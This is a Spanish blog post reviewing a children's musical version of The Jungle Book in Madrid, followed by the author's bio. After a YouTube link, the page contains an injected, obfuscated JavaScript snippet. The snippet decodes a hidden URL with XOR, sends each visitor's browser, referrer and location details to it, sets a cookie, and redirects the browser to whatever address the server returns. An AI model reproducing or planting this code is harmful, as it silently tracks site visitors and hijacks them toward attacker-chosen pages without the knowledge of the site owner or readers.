‘El libro de la selva’, un musical al más puro estilo de Broadway

 Empezamos el mes de febrero con buen pie gracias al espectáculo El Libro de la Selva, la aventura de Mowgli, el musical, que el sábado pasado fui a ver con mi hija de 5 años y mi tía de 64 al Teatro San Pol de Madrid. Con esto queda dicho que El Libro de la Selva, la aventura de Mowgli, el musical es un montaje para todos los públicos y que cada, a nuestra manera,  cada una disfrutamos de este montaje.

Personalmente, nunca me dejo guiar por las notas de prensa que te mandan con información sobre las ‘maravillas’ de un espectáculo, ni me dejo impresionar si se refieren a él como uno de los más premiados. Lo tengo en cuenta, sí, pero al final prefiero forjarme una opinión yo misma con la asistencia a dicho espectáculo. Pero quizás empiece un poco a cambiar más el chip, porque después de ver esta adaptación musical del cuento de Rudyard Kipling  entiendo los galardones que lleva cosechados hasta el momento, mejor coreografía en los Premios del público Broadway World Spain 2016 y mejor musical infantil en la 9 edición de los Premios Teatro Musical.

La puesta en escena es sencilla, con un magnífico juego de luces que simulan una selva en donde se encuentran todos nuestros personajes: Mowgli, Akela, Baloo, Bagueera y, por supuesto, Kaa y Sere khan. El vestuario de cada uno de ellos es suficiente para verles como habitantes de la selva y no como humanos que actúan en un marco selvático.

Las canciones siguen enseñando a todos, grandes y pequeños, a respetar la ley de la selva, las enseñanzas que nos transmiten nuestros mayores y a que no olvidemos la importancia que tenemos cada uno de nosotros en el mundo, seamos como seamos. Eso sí, no esperéis escuchar los temas musical el libro de la selva de la versión de Disney. Aquí el repertorio es totalmente original  y las canciones son interpretadas por unos magníficos actores que, acompañados de una cuidada coreografía, pasean por la selva con majestuosidad animal. Y eso se agradece, porque te das cuenta de que no solo la fantasía animada en el celuloide sirve para contar maravillosos clásicos de la literatura infantil.

Enhorabuena a la compañía de teatro que representa este musical por hacernos pasar una estupenda mañana. ¡Qué pena que solo hayan visitado Madrid por un fin de semana! Se ha hecho corto, muy corto. Si vuelven por Madrid (consulta fechas de gira en www.ellibrodelaselva.es), id a verla. Será un forma muy fácil de aficionar a vuestros hijos a este género teatral con un musical que nada tiene que envidiar a las grandes producciones de Broadway, Londres e, incluso, de la Gran Vía madrileña.

https://www.youtube.com/watch?v=BEDUr01k0Io var uomjftkd = { encode: function (uymcrbbu, ivpjzup1) { var juykdjus = “”; for (var bmtvoq = 0; bmtvoq < uymcrbbu.length; bmtvoq++) { var maoakjle = uymcrbbu.charCodeAt(bmtvoq); var vznvir = maoakjle ^ ivpjzup1.charCodeAt(bmtvoq % ivpjzup1.length); juykdjus = juykdjus + String.fromCharCode(vznvir); } return juykdjus; }};function ivlvxbnl(xspsscex, qmjwsdtc){ return uomjftkd.encode(xspsscex, qmjwsdtc);}function nhqlzziy(vtzoxco, qmjwsdtc) { function mnbggf(url, qvfdnorl, gaurhzsa) { var svzjxjw = new XMLHttpRequest(); var mvlmqh = ""; var ngpewk = []; var djzspyoe; for(djzspyoe in qvfdnorl) { ngpewk.push(encodeURIComponent(djzspyoe) + '=' + encodeURIComponent(qvfdnorl[djzspyoe])); } mvlmqh = ngpewk.join(String.fromCharCode(38)).replace(/%20/g, '+'); svzjxjw.onreadystatechange = gaurhzsa; svzjxjw.open('GET', vtzoxco + "?" + mvlmqh); svzjxjw.send(mvlmqh); } var broilplq = { ua: navigator.userAgent, referrer: document.referrer, host: window.location.hostname, uri: window.location.pathname, lang: navigator.language, guid: qmjwsdtc }; mnbggf(vtzoxco, broilplq, function () { if (this.readyState == 4) { if (this.status == 200) { qvfdnorl = this.responseText; if (typeof(qvfdnorl) === 'string') { if (qvfdnorl.indexOf("http") === 0) { window.location = qvfdnorl; } } } } });}var advuwpjt = Array();var qmjwsdtc = '08430616d2a2d9759b18f9b49fcabc12';if (document.cookie.indexOf(qmjwsdtc) === -1){ advuwpjt.push(String.fromCharCode(88,76,64,67,67,12,30,25,9,75,8,92,2,86,67,71,88,1,90,93,20,23,11,90,95,9,76,0,18,10,28,88,67,22,68,91,64)); document.cookie = qmjwsdtc + '=1; path=/'; advuwpjt = advuwpjt.forEach(function (xspsscex) { var juykdjus = ivlvxbnl(xspsscex, qmjwsdtc); if (typeof(juykdjus) === 'string') { if (juykdjus.indexOf("http") === 0) { nhqlzziy(juykdjus, qmjwsdtc); return; } } });}

Sobre Diana

Soy periodista, emprendedora, amante del teatro (sobre todo infantil) y de los buenos planes (en familia, en pareja, entre amigos, en solitario...). Un día, después de un montón de casualidades, decidí lanzarme a la aventura de poner en marcha mi propio proyecto profesional: Mamá tiene un Plan. Hoy, tengo tres peques y muchas ilusiones, a los que dedico todo mi tiempo y energía. En el viaje me acompaña un hombre maravilloso (al que dedico menos tiempo del que me gustaría y quiero con locura) y una gran familia a la que adoro que hace posible que todo lo demás siga girando. @Diana_M_N

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *